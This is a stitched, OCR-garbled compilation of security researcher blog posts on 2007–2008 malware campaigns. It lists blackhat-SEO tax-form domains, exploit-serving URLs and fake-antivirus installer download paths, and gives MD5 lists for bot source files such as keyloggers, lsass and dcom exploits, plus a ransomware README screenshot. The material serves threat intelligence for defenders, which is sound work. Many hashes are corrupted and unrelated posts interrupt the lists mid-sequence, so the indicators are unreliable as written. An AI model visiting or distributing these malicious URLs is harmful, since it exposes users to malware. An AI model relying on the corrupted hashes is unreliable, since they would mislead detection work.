I’ve decided to share a massive and diverse portfolio of rogue and potentially malicious do- 
mains portfolio utilized by cybercriminals while participating in a blackhat SEO tax forms 
themed rogue and malicious software serving campaigns circa 2008. 


In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in- 
depth the tactics techniques and procedures of the cybercriminals behind it. 


Sample portfolio of rogue and malicious tax forms themed domains portfolio currently in 
circulation circa 2008: 


http://free-1500-hicfa-form-printable.foper29i142.dynodns.net/ 
http://printable-free-contractor-bid-form.fuder29i160.dynodns.net/ 


http://form-ct-1040x-printable-version.fuder29i145.dynodns.net/ 
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http://printable-irs-form-1040.fuder29i130.dynodns.net/ 
http://printable-irs-form-w-9.fuder29i133.dynodns.net/ 
http://form-irs-printable-tax.fasoe29i130.dynodns.net/ 
http://printable-tool-inventory-form.foper29i142.dynodns.net/ 
http://form-irs-printable.fuder29i142.dynodns.net/ 
http://1099-misc-printable-form.fuder29i130.dynodns.net/ 
http://printable-free-tax-form.fuder29i142.dynodns.net/ 
http://printable-and-edit-form-1040.fasoe29i139.dynodns.net/ 
http://printable-homeschool-transcript-form.foper29i130.dynodns.net/ 
http://printable-1040-form.fasoe29i136.dynodns.net/ 
http://blank-receipt-form-printable.fasoe29i127.dynodns.net/ 
http://printable-preschool-admission-form.fuder29i148.dynodns.net/ 
http://printable-irs-form-w-9.fasoe29i139.dynodns.net/ 
http://printable-immunization-form.fasoe29i136.dynodns.net/ 
http://printable-hippa-form.fasoe29i133.dynodns.net/ 
http://irs-1040ez-printable-form.fuder29i133.dynodns.net/ 
http://1040-ez-printable-form.foper29i130.dynodns.net/ 
http://printable-u-s-tax-form-1041.foper29i142.dynodns.net/ 
http://free-printable-creditl-form.fuder29i130.dynodns.net/ 
http://printable-ub-92-claim-form.fuder29i133.dynodns.net/ 
http://form-ssa-623-printable.fuder29i160.dynodns.net/ 
http://printable-copy-of-fafsa-form.fuder29i133.dynodns.net/ 
http://printable-foreclosure-form.foper29i130.dynodns.net/ 
http://1099-misc-form-printable.fuder29i145.dynodns.net/ 
http://free-rent-agrement-printable-form.fuder29i145.dynodns.net/ 
http://printable-1040x-form.fuder29i142.dynodns.net/ 
http://free-printable-health-claim-form.lasae29i211.dynodns.net/ 
http://printable-home-school-form.foper29i148.dynodns.net/ 
http://form-free-legal-ohio-printable.fuder29i154.dynodns.net/ 
http://cub-scout-den-dues-printable-form.fuder29i145.dynodns.net/ 
http://printable-work-schedule-form.fuder29i127.dynodns.net/ 
http://printable-schedule-form.fuder29i133.dynodns.net/ 
http://free-printable-divorce-form.fuder29i130.dynodns.net/ 
http://printable-ub92-form.fasoe29i127.dynodns.net/ 
http://blank-printable-info-form.fuder29i127.dynodns.net/ 
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http://make-an-adobe-form-printable.fuder29i145.dynodns.net/ 
http://form-ds-11-printable.foper29i130.dynodns.net/ 
http://printable-blank-petition-form.fuder29i133.dynodns.net/ 
http://printable-blank-newsletter-form.fasoe29i127.dynodns.net/ 
http://blank-printable-info-form.foper29i130.dynodns.net/ 
http://printable-form-646-va.fuder29i142.dynodns.net/ 
http://2006-printable-federal-tax-form-1116.lasae29i211.dynodns.net/ 
http://printable-2006-1040-form.foper29i142.dynodns.net/ 
http://free-printable-employee-attendance-form.fuder29i145.dynodns.net/ 
http://eeo-form-printable-2007.fasoe29i133.dynodns.net/ 
http://free-printable-2008-w-2-forms.fuder29i142.dynodns.net/ 
http://free-printable-form-i-9.fasoe29i127.dynodns.net/ 
http://free-printable-invoice-form.fasoe29i130.dynodns.net/ 
http://bill-form-free-printable-sale.lasae29i211.dynodns.net/ 
http://osha-300a-printable-form.foper29i142.dynodns.net/ 
http://printable-automobile-estimate-form.fuder29i148.dynodns.net/ 
http://free-pantry-inventory-form-printable.lasae29i211.dynodns.net/ 
http://free-printable-w-9-forms.fasoe29i130.dynodns.net/ 
http://printable-form-646-veterans.foper29i142.dynodns.net/ 
http://free-printable-1040-tax-form.fuder29i148.dynodns.net/ 
http://nhomeschool-form-printable-free-checklist.fuder29i160.dynodns.net/ 
http://printable-irs-tax-forms-w-4.foper29i142.dynodns.net/ 
http://printable-check-request-form.fazer29i145.dynodns.net/ 
http://printable-voe-form.foper29i160.dynodns.net/ 
http://printable-copy-of-fafsa-form.fuder29i139.dynodns.net/ 
http://free-printable-order-form.fazer29i139.dynodns.net/ 
http://irs-140t-printable-form.fuder29i133.dynodns.net/ 
http://fisma-printable-report-form.lasae29i211.dynodns.net/ 
http://printable-state-of-indiana-beneficary-form.foper29i127.dynodns.net/ 
http://printable-copy-of-fafsa-form.fasoe29i139.dynodns.net/ 
http://deb-9091acon-printable-form.fasoe29i136.dynodns.net/ 
http://1040-ez-forms-printable.fuder29i145.dynodns.net/ 
http://free-printable-lease-form.foper29i151.dynodns.net/ 
http://printable-loan-application-form.foper29i127.dynodns.net/ 
http://free-printable-credit-rental-form.foper29i142.dynodns.net/ 
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http://1820-printable-census-form.fuder29i139.dynodns.net/ 
http://north-carolina-printable-death-certificate-form.foper29i145.dynodns.ne t/ 
http://printable-work-schedule-form.foper29i139.dynodns.net/ 
http://eeo-form-printable-2007.fazer29i133.dynodns.net/ 
http://printable-time-tracking-form.fuder29i130.dynodns.net/ 
http://free-printable-grant-deed-form.fasoe29i139.dynodns.net/ 
http://free-printable-personal-accounting-form.foper29i145.dynodns.net/ 
http://printable-time-tracking-form.foper29i157.dynodns.net/ 
http://printable-w9-form.fuder29i139.dynodns.net/ 
http://printable-i-9-forms.fazer29i142.dynodns.net/ 
http://nc-dl-123-printable-form.fuder29i133.dynodns.net/ 
http://printable-girl-scout-cookie-form.fazer29i148.dynodns.net/ 
http://printable-iou-form.fasoe29i139.dynodns.net/ 
http://form-w-9-printable.fazer29i130.dynodns.net/ 
http://free-printable-bill-of-sale-form.foper29i142.dynodns.net/ 
http://find-printable-i-9-form.fazer29i133.dynodns.net/ 
http://printable-w9-form.foper29i154.dynodns.net/ 
http://printable-change-of-address-form.fazer29i148.dynodns.net/ 
http://ct-1040ez-printable-form.fazer29i130.dynodns.net/ 
http://printable-order-form-template-exel.fazer29i127.dynodns.net/ 
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qyxjxx.com/admin/inc/index.htm 
xi530.com 

jzkj.icp365.cn/index.htm 

52fans.net 

218.84.59.218/img/c/ 
918a.com.cn/123/index.htm 
filch.net/img/img/liqiuf.htm 
jiashiyin.com/qq/index.htm 
flymir2.com/liouliang/mama/index.htm 
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heitianshi.cn/love/index.htm 
jm.xiliao.cc/windows/vip.htm 
90to.com/qq/index.htm 

cmctn.com 

jcqing.com/mm/index.htm 
chinesefreewebs.com/admin88/2.htm 


These are all courtesy of what looks like Chinese folks, and represent a good example of 
what [4]malicious economies of scale are as a concept that emerged during 2007. Years ago, 
when a vulnerability was found and exploit released, malicious parties were quickly taking 
advantage of the "window of opportunity" following the myth that the more publicity the 
vulnerability receives, the more useless it will get, given more people will patch. That’s sucha 
wishful thinking, one [5]the people behind Storm Worm apparently [6]perceived as [7]FUD-ish 
one, and by [8]not following it, ended up with operating [9]the largest botnet known for the 
time being - a botnet that was built on the foundations of outdated vulnerabilities pushed 
through emails, using sites as the infection vector , and not a single zero day one. 


How are risks hedged? Risks are hedged by following the simple diversification princi- 
ple, which from a malicious perspective means increasing the probability for success. By 
using a single exploit URLs like the MDAC in this case, the chances for success are much 
lower compared to diversification of the "exploits set", a daily reality these days thanks to the 
emerging malicious economies of scale mentality in the form of web exploitation kits such as 
[10]MPack, [11]lcePack, [12]WebAttacker, the [13]Nuclear Malware Kit and [14]Zunker as the 
most popular ones. 


Here’s a related article - "[15]Zero-Day Exploits on The Decline" : 


"One of the reasons is that bad guys don’t have to use them (zero day)," said Skoudis, 
who also founded information security consultancy Intelguardians. For example, he said, the 
Storm worm propagates itself though users clicking on an e-mail link, and does not require 
a zero-day exploit to function. "When simple techniques work, there is no need to unfurl 
zero-days," Skoudis said. "Attackers can just save them for more targeted attacks." 
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So, how did the people behind Storm Worm ended up with the world’s largest botnet? 
They simply didn’t believe in the effectiveness of [16]populist generalizations of security in 
the form of patching, and abused the miscommunication between the industry that’s still 
preaching perimeter defense is the panacea of security, and the end user, the one whose 
Internet connectivity results in [17]all the spam, phishing and malware we'’re all receiving, by 
stopping to target what the solutions protect from, and migrating to niche attack approaches 
to use as infection vectors - today’s [18]client side vulnerabilities courtesy of a malware 
exploitation kit that were found embedded on the majority of [19]infected web sites incidents 
I’ve been assessing for the last couple of months. 
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http://1040ez-printable-income-tax-form. filer29i148.dynodns.net/ 
http://printable-tax-tables. fiter29i130.dynodns.net/ 
http://printable-1040-ez-forms.fiter29i139.dynodns.net/ 
http://1040-printable-tax-form.fiter29i145.dynodns.net/ 
http://printable-1040-federal-tax-form.fiter29i139.dynodns.net/ 
http://1040ez-printable-income-tax-form. filer29i154.dynodns.net/ 
http://blank-printable-1040a-tax-form. fiter29i139.dynodns.net/ 
http://i-r-s-printable-forms.fiter29i133.dynodns.net/ 
http://free-printable-aia-forms-g702.fiter29i133.dynodns.net/ 
http://printable-tax-form-1040.fiter29i133.dynodns.net/ 
http://1040-easy-tax-form-printable. fiter29i160.dynodns.net/ 
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http://online-printable-medical-forms. filer29i139.dynodns.net/ 
http://free-printable-contractor-forms. fiter29i127.dynodns.net/ 
http://1040-ez-printable-form.fiter29i127.dynodns.net/ 
http://free-printable-cryptoquote.fiter29i130.dynodns.net/ 
http://free-printable-cover-letter-forms.filer29i142.dynodns.net/ 
http://2008-printable-1040ez.filer29i139.dynodns.net/ 
http://free-printable-1040a-form.fiter29i151.dynodns.net/ 
http://free-printable-office-forms.fiter29i145.dynodns.net/ 
http://free-printable-cryptoquote.filer29i142.dynodns.net/ 
http://free-printable-income-verification-forms.fiter29i160.dynodns.net/ 
http://free-printable-forms-and-checklists.fiter29i142.dynodns.net/ 
http://free-printable-irs-form-1040a.fiter29i157.dynodns.net/ 
http://free-printable-accounting-forms. filer29i157.dynodns.net/ 
http://irs-printable-form.fiter29i130.dynodns.net/ 
http://free-printable-disney-love-scene-pictures.fiter29i145.dynodns.net/ 
http://printable-bookkeeping-forms.fiter29i160.dynodns.net/ 
http://printable-general-ledger-forms.fiter29i133.dynodns.net/ 
http://divorce-form-free-printable. fiter29i160.dynodns.net/ 
http://printable-cake-forms.fiter29i130.dynodns.net/ 
http://printable-ct-1040.fiter29i133.dynodns.net/ 
http://free-printable-loss-of-wages-form.fiter29i142.dynodns.net/ 
http://christian-trumpet-printable-music-sheets.fiter29i133.dynodns.net/ 
http://free-printable-2009-corvette-calendar.filer29i157.dynodns.net/ 
http://job-ledger-forms-printable.filer29i148.dynodns.net/ 
http://medco-printable-perscription-forms.filer29i142.dynodns.net/ 
http://blank-printable-info-form.fiter29i130.dynodns.net/ 
http://valetine-tractor-printable.filer29i142.dynodns.net/ 
http://printable-saduko-pages.filer29i136.dynodns.net/ 
http://2008-whole-year-free-printable-calender.fiter29i139.dynodns.net/ 
http://ri-1040ez-2007-printable-tax-forms.fiter29i139.dynodns.net/ 
http://free-printable-disclosure-statement.fiter29i145.dynodns.net/ 
http://1040-x-tax-form-2006-printable. fiter29i133.dynodns.net/ 
http://free-printable-medical-brochures.fiter29i160.dynodns.net/ 
http://free-printable-sudoku-worksheets.fiter29i139.dynodns.net/ 
http://free-printable-religion-quiz-worksheets.fiter29i127.dynodns.net/ 
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http://printable-commitment-certificate.fiter29i148.dynodns.net/ 
http://free-printable-thanksgiving-clip-art.fiter29i142.dynodns.net/ 
http://printable-check-for-kids.fiter29i130.dynodns.net/ 
http://printable-flascards-in-multiplication.fiter29i142.dynodns.net/ 
http://coloring-and-parrot-and-printable.fiter29i142.dynodns.net/ 
http://printable-catalog-paper.fiter29i139.dynodns.net/ 
http://free-printable-lapbooks.filer29i151.dynodns.net/ 
http://oedipus-at-colonus-printable.filer29i151.dynodns.net/ 
http://birthday-printable-pages.fiter29i151.dynodns.net/ 
http://free-coloring-opages-printables.filer29i157.dynodns.net/ 
http://learning-colors-free-printables.fiter29i127.dynodns.net/ 
Stay tuned! 


16.10.29 Exposing Modern Client-Side Exploits Serving Kits - An AV and Snort IDS 
MD5 List Compilation - Part Seventh (2020-12-12 14:22) 


[1] 

|C) blowfish.c 20 KB CG source file 

iH] crypth 10 KB G header file 

[H] mpih 6 KB GC header file 

'H] mpi-contig.h 2KB GC header file 

iC] RansomWar.c 11 KB C source file 

2 KB text file 
uy 1 RRR Briard FSNfird Gr eniewedl ©: CSP RAW iPRA «CU MAral EPRPMeen <P Bee mA ‘UB 

1|-- README -- 4 

2)4 

3}-- Introduction --+ 

4] 4 

BJHi, this is a shitty example of ransomware, If somebody doesn’t know whata rai 
Blis I will explain it. 4 

7|Basically a ransomvare is a malware that makes something of evil to the user’s 
8\for example it can delete files or encrypt them. 4 

§|The user can avoid this sending something to the author of the malware, a “ran: 
10|get back his files. 4+ 


Dear blog readers, 


This is the seventh post part of my "[2]Exposing Modern Client-Side Exploits Serving Kits - An 
AV and Snort IDS MD5 List Compilation - Part Six" blog post series where | intend to share 
actionable threat intelligence with vendors and organizations with the idea to assist them in 
protecting their networks and the networks of their clients and customers. 

In the seventh post part of the series | intend to provide additional MD5s for some of the high- 
profile and currently popular and in circulation hacking tools with the idea to assist vendors 
and organizations on their way to properly protect their infrastructure and the infrastructure of 
their clients and customers. 


Sample MD5s for some of the currently active hacking tools currently circulating in the wild: 
1Readme.txt 
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103955130f7ca7587403034150835b6e 
about.txt 
afb6d7106997ff02dfd79cf52d9da46a 
advscan.cpp 
27a9ef27945d97f05dd2899a99f06364 


advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
AE.txt 
83661d09ab0b84f9dbO00bbc36a0d0dd1 
akbot.cpp 
15a35d6d8a7e7d6f78e472c114dade43 
akbot.dsp 
le8ac99e1266c3ceca38al5cabce7bae 
akbot.dsw 
070ad2277e7f342300490df5765e6446 
akbot.h 
f8cd612246d5ed834d95c6081al1a17f0 
aliaslog.cpp 
3c3dc737aabb6dc8043581e9e0228df5 
aliaslog.h 
8fcfe7cd78ad90da601e01433b2e575f 
asn.cpp 
e82551c52aaf0d6bd14c8665fd2ddal19 
asn.h 


b9321a4d186254af897035566e86e114 
asnl.cpp 911f562ef0flda41705adce335cf7789 
asnl1.h 

a15ad7d29307ff55d7bd7d5213c25259 
autostart.cpp 
db2ce24b9bd3465f36b11f46f644a293 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
c44f698e60bbfb1b911ed6fef88cd718 


avirus.h 83ce40f642e00b7b1cba56beb9924e82 
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bOrg.c 
5958977d3436a082f92e766eaff7425a 
bOrg.h 
8c151beebc5e9edeadf945c04cf9c024 
bOrg2.h 
33e018e1e48dd6f0b4ebalf662baeb59 
backdoor.cpp 
2a47fa96a857270cbcc8b7balf3cc86b 
backdoor.h 
00b4beadff70b7e2167937dbd757b382 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c719251ladba69d0c4bb 
beagle.cpp 
51ba641d2119a570201bd63f6c3bca31 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
bothacker.exe 
f02d332972e74e0a4195221252681f3b 
botkiller(1).cpp 
a56dad6b8fa71da4b3ddecc127e71776 
botkiller.cpp 
4e827cbc9ff82b9b92ae20a86c8a0d12 
botkiller.h 
6f5c98b3bb6F39be894942ce08dd252ce 
botnet.pdf 
972a34cf7de1114b87a7891aa1659db5 
build.bat 
£7955bb06521e363ce65ffboc1b83a26b 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd3labbe40c4 
CaptureConsoleOutput.bas 
7£2926d6c9554598d3c34f8109ced53e 
cdkeys.cpp 
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3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
CHANGES!!!.txt 
518606f61e32ddb884341daf02906681 
changes.txt 
dd8f4fb15e5968e80df48ca88d17ffd2 
cisco.cpp 
94ad183aab834dfd0b3c1f64f6cd4b33 
cisco.h 
68001b126ddedc77772ef91d88ffb2ed 
clean.bat 
240a69310bb1f6ad33b3cOb6c611b8ea 
commandref.htm| 
ea2f81519d46cbfdbfe795b0e0911871 
commands.cpp 
c1d5b741b88967bb69e333d32546b990 
commands.h 
89040fed6a3832f75a4b978ee0ffo4d1 
config.h e2e7c5851b4a0ea63156cae36da5c04e 
config. ini 
18bb1fa6a0a9029908af6c5ffbf7dd87 
config.txt 
Ob8f1d2c0c6a13da388379ddbd1f93d4 
ConfigGUl.exe 
d37e04456d860d7bac747943a88e1129 
configs.h 
7e240e6f45649fd96a4c90dfe9e8edcc 
connback.cpp 
22788867eedb4363a20523252d30163b 
connback.h 
9c06383e5be20fd3e52330931d224efd 
crc32.c 
c2e731d846a546c70/7ffbb7e35a8df40 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
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crc32.h 

1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
credits.txt 
b457b9876347381b1c103812358eb978 
crypt.cpp 
f8d56522e7015cff349715794104c50f 

crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
CSocketMaster.cls 
90d8191f47beca84eb5dea72ef331laec 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
dameware.cpp 
46f61dbbfe73389bb0e4e8eb26035a2d 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dbot.dsp 9734e3ffb8fbf79725f699f7bc137c8a 
dbot.dsw 31c4c6b800668d17339f7e4ba8fabfba 
dbot.opt bde3fec21a221e1204cb884019000169 
dcc.cpp 
5aafflla73110648db023ef374a48f31 

dcc.h 

€44c57141c37593156064072bd6570c2 
dcom.cpp 3ccab587bca4ad021bddcO0ebcb3e40bb 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom135lsass.cpp 
83aa7079b550834194e6f2ad0339f348 
dcom135lsass.h 
bc7107ecaf2d45fb58372a9ca35df898 
dcom2.cpp 
dde0918a16258b166ced74613d91de43 


dcom2.h 
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3.12.3 A Diverse Portfolio of Fake Security Software (2007-12-07 22:46) 


BestsellerAntivirus 


home 
features 


SNMANUY 10/051 SOG 


2) Frew at us rerece sont 
3) Posrup blotker: you remedy agaist BesteclierAntivirus 


4) AntiSoryware a ork 


DOWNLOAD NOW! 


free Services 


DOWNLOAD NOW! 


The recently exposed [1]RBN’s fake security software was literally just the tip of the iceberg 
in this ongoing practice of distributing soyware and malware under the shadow of software 
that’s positioned as [2]anti-spyware and anti-malware one. The domain farm of fake security 
software which I'll assess in this post is worth discussing due to the size of its portfolio, how 
they’ve spread the [3]scammy ecosystem on different networks, as well as the directory 
structure they take advantage of, one whose predictability makes it faily easy to efficiency 
obtain all the fake applications. This particular case is also a great example of the typical 
for a [4]Rock Phish kit [5]efficiency vs quality [6]trade off, namely, all the binaries dispersed 
through the different domains are actually hosted on a single IP, and are identical. 


Who’s hosting the malware and what directory structure per campaign do they use? 


It seems as content.onerateld.com (87.248.197.26) which is hosted at Limelight Networks 
is used in all the domains as the central download location. The directory structure is as follows : 


content.onerateld.com/antiworm2008.com/AntiWorm2008/install _en.exe 
content.onerateld.com/avsystemcare.com/AVSystemCare/install _en.exe 
content.onerateld.com/winsecureav.com/WinSecureAv/install _en.exe 

content.onerateld.com/goldenantispy.com/GoldenAntiSpy/install _en.exe 
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€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
34b3b9dbc57d911b6dfd9b9b2b13445e 
dnsxpl.h 9031a4f369b6514c7d530c3e15175f4e 
dnsxplc.cpp 
fc34d615a9c2dc9caed5cf7ea5438045 
dnsxpl _c.c 

8c064aff02139a687 75a3b538995aaa3 
dnsxpl _s.c 
d64bd289e74eebc17cd908c1fa06cf7b 
download.c 
6655ea7ba944b4ed811ff74b32708e57 
download.cpp 

664845639 Laff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
downloaded from bots.bl.am.txt 
6457a1ac363941b253f10a15c5df312f 
downloader.cpp 
7c2d70ff0eale2858ceef4c623e55242 
downloader.h 
4609446912718ffa6ac797869adfe8a2 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
encryptedsettings. ini 
4d71091b2e07d06018be48866455fda8 
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extern.h c58ab6abe139f83b46b915960323815b 
externs.h 
872fe€858d10a5355e0e70063072387d8 
features.txt 
11a15el1fab4f33d2c9466848a006e45d 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
flood.cpp 
al169a160137de74d6f6df18fd20d5c10 
flood.h 

4607d7eff8b5f60d4eeb6af3 9f8cfce04 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
frmIRC.frm 
82df9d9a356b1bfe05e06cff6587 7563 
frmVIRC.frm 
€3673ff9d71c2ee95d9bb9fee89ede18 
frmVIRC.frx 
a9075b8bc6945ecf03fa931394905d36 
ftpd.c 
ffe243a0caef05f66fd114f41fb81904 
ftpd.cpp e8a88ec0c461d7de7ce39c4db3540789 
ftpd.h 
48a891506c957340b207b627105d7bb4 
fu.cpp 
a440aa309d36ca486a4dff526dbea221 
fu.h 


5ee58b9c18fe86d14654fe31c1793606 
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fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
harvecter.c 
461b86531f47b92f2f0d768c0da8a8c6 
harvecter.c.pdf 
4680d07509f6d38e9ab3332cd2b5c423 
HarveCter 0.8 basics manual.jpg 
9f13c88f98168e415d76fde4d241d3f0 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
http _server.pdf 
eed3739edac4d1be28f52e99365e559f 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 


icon.ico d32c33d152fced35653164b5661cf213 


ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
iis5ssl.cpp 
50225071413f4969c0ccbd0662c238e0 
iis5ssl.h 
c59eb88c83cff84e75a02897215ad2ce 
imail.cpp 
a8bc910d033edf15e01030b3bf43050b 
imail.h 
6fcafae441539867a78f8955e49177bc 
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include.h 
61d223b91c96546111486a8d4cd7f662 
includes.h 
8c93c3968b66cf8a4e05f0b324c77da5 
info.cop 948acaa3d8a91285e456fe727a9bfe00 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
ip.cpp 
lcad56delfe676c5da990be0167b25b5 
ip.h 
6c6c30d036614da833f2704921cbelae 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
ircbot.exe.warning 
c72652d4680be4876a7c992c9b712103 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
3f096520af9b4cbb5de7ddde53e84dbb 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
libmySQL.dll 
5c82aa0811d81b4caf189bc70f59d86d 
list.txt 50594305fa90c9596c69be1ad1a454a4 
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loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
Adf2f4f62f2689dc345b2aabf34e4e63 
Isass.h 
30af5080bcec2b6a1e602029757ada2b 
LSASS.vbp 
a1d43840c8d8f099cac9a65718f0d929 
Isass2.cpp 
26fa9f8f14805805c528f27a7bfc427b 


Isass2.h 03467635387d90070eccb6fab5f00aac 
main.cpp 866c04fdeddc92df9e29994c0d8edfbb 


main.h 
594d1bfa45674a39043c87b80b009f4b 
make spybot.bat 
95d98de914869121431e42d2fc564c65 
make with versioninfo.bat 
f03e428af9e73b600648bbf79b60dd89 
make-lIcc-bOrg.bat 
0237e78a9e8cC7e85513ed1772b83951f 
make-Icc.bat 
fd2abd5978c533c6773bb978344d58f8 
make-mingw.bat 
30e01644fc77238d506ada5ff7421a7d 


make.bat 8123e35c5859cb80772d401dfc995a5a 


manuals.txt 
fb729b59665c3170d0cf0c21a92af30d 
md5.c 
c85b0414724a639a42c6a2dc23a5cO0f4 
md5.cpp 
1f257ec36f26698151ef6bc737205d42 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
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MD5Checksumftest.exe 
3a83507faf3e5503ce01lc6ba85eeal2a 
md5sum.c 82c6e20a337ffe6c5f034c91f4c4cade 
messenger.cpp 
21fced574fe41eeced55ed6537420b32 
messenger.h 
4ce2b10101e841b90074b82b52393147 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 
modping.bas 
623f58e87697bb7035690f4116b625d9 
modSocketMaster.bas 
ed38beba362cb9fe54a55b9b31246b00 

ms04 007 asnl.cpp 
49c89fdf6a2d4f63a24be7f3660cb842 

ms04 _007 _asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
msmq.cpp 1211694d60ee3ccd4241faf708129c75 
msmq.h 

a1d868437310f90efebb0d46ca671103 
MSSCCPRJ.SCC 
6fe5626572ac96c92e95d381d68dc787 
mssql.cpp 
90aeb10fafd47edd748a495b1c5baelb 

mssql.h 

742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
c654e795179ec451007c138ccbd0e80d 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
myudf.exe 
4cf25c7f3eaae1f394ae950d6a94cc35 
nekrokiller.dll 
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fd479c7e555baadaf2c44b057fa47352 
nekrokiller.exe 
09df9ebd77413848b345fc7aeefe3elb 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netapi.cpp 
2ab50a25560fd8eb0892426f58f31813 
netapi.h 60b1ffd549f975d392e2f9a2f4f4c3d5 
netbios.cpp 
cbb8b7b5a54122492e30ec85430fa37e 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdde.cpp 
02c804954d055a471cfe37348ec28749 
netdde.h 717faalb591f7b9e0dbca80c3393ac6f 
netdevil.cpp 
84f773bcd032f6b729d37b6b8e849304 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
netutils.cpp 
7€91597¢24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
New Text Document.txt 
9e57a7f7089fd801798bebe02bdffb84 
newbot.exe 
970011adac5d0a6708a839d004fbeeaf 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
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niggerbot.c 
b5f56e56818425ad73be060769af0369 
niggerbot.h 
54791799f7f29d3d7156b7c045al186ac 
optix.cpp 
7cd0673b0fb104808a5d5c81c07a2c27 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h 765bf229e871b3ec59a6f8107bc6afc5 
patcher.cpp 
fd3ebd1893968f9f3ed000ff604cff03 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
plsass.cpp 
863b6bc8f0085bccc32eaa3b09098c5a 
plsass.h 8a3c574a7ec536fda04fe75db2a97906 
pnp.cpp 
bc44704322a9395cadla77bbce4d30d2 
pnp.h 
0d164366352a45fed1d5baaada0bce02 
pnp445.cpp 
c761581559513dafe45f54ce33f47bfa 
pnp445.h 1136f0ee3455546584797022624d70a8 
process.cpp 
5689e7393fdfaeeb59bbc3310c2296a4 
process.h 
22c13cbc884c6e12c2002eb294601625 
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processes.cpp 
98cc8b0c13262aedade254e855419786 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
prolIRC.vbp 
f2acf106e58eebdb96f8946ce2323743 
protocol.cpp 
74f42a7dc29c86872a6b169549cf9alb 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 

PSAPI.H 

fb2f9b8643d332716939b162e0798bdf 
PSAPI.LIB 
982bf26a0cbe39c84c444db7aea4c518 
psexec.h d933826b6cf92d7ab5dbbe5ccfe7b121 
psniff.cpp 
€043db547ea8d03bdb321456b3237bdd 
psniff.h Oea96cb2476fe3e5b65c490d8a042da2 
pstore.cpp 
279bd2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
pstorec.tlh 
€2d75122811d24290ac752869a9517b1 
pstorec.tli 
fbaae7f7c52586a9a79ee886348faa05 
qvncpass.cpp 
al0f3df60463544f65bd9f2fc3a79f3b 
qvncpass.h 
99c77c9c8ac1c92eb502161ad92cde91 
random.cpp 
4f83bbb6667242b8faaffe715bb72e7e 
random.h 72101c961e86107d6d1d0e2b70fcelel 
